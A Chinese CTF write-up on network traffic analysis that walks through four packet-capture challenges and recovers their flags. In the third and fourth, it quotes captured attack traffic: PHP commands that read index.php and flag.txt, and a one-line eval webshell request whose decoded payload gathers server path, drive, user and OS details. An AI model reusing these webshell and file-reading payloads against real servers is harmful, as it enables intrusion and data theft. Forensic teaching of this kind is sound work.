您当前的位置: 首页 > 

合天网安实验室

暂无认证

  • 0浏览

    0关注

    748博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

流量分析-CTF题目实战

合天网安实验室 发布时间:2018-04-24 18:50:00 ,浏览量:0

本文原创作者: 一叶飘零

原创投稿详情:重金悬赏 | 合天原创投稿等你来!

前记

最近准备了一个流量分析的课题,于是搜集了一些题目

本篇文章为第一篇:流量分析-CTF题目实战

后续会继续撰写:流量分析-企业渗透案例

题目1

打开流量包即可看到

解码得到

user:test@51elab.com

passwd:FLAG:ISCCTESTpas

即可完成第一题

题目2

随便跟踪一个tcp流

流0:

流1:

即可发现flag

moctf{c@N_y0U_4lnd_m8}

题目3

我们切换至http进行查看

发现大量数据爆破,猜想是黑客进行扫描

浏览之后,发现最后存在可疑操作

黑客执行phpinfo成功

然后分别执行命令

php

print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXgucGhw%22))))

print_r(gzcompress(file_get_contents(base64_decode(%22ZmxhZy50eHQ%22))))

我们解码查看操作文件名

index.php

flag.txt

发现黑客最后将flag.txt的内容读取,并进行gz压缩

我们切换至原始数据,提取flag.txt的gz压缩二进制内容

789ccbc82c492e49abb6304d32484c354eb4483437b048b234324f4a334c343648494b334e36333531a8e5020018cb0c6c

保存成文件

然后写脚本进行解压缩

php

即可获得flag

hitctf{85b0ae3a8a708b927bf1a30dff3c6540}

题目4

同样,我们先查看http流量

可以发现有人不断像

/uploads/dvwa.php

提交POST数据

根据目录,猜想可能存在一句话木马,进入tcp流跟踪

果然发现可疑操作

cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D

解码

cmd=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

解base64

php

@ini_set("display_errors","0");

@set_time_limit(0);

@set_magic_quotes_runtime(0);

echo("->|");;

$D=dirname($_SERVER["SCRIPT_FILENAME"]);

if($D=="")

$D=dirname($_SERVER["PATH_TRANSLATED"]);

$R="{$D}\t";

if(substr($D,0,1)!="/")

{

foreach(range("A","Z")as $L)

if(is_dir("{$L}:"))

$R.="{$L}:";

}

$R.="\t";

$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';

$usr=($u)?$u['name']:@get_current_user();

$R.=php_uname();

$R.="({$usr})";

print$R;;

echo("|

关注
打赏
1665306545
查看更多评论
立即登录/注册

微信扫码登录

0.0374s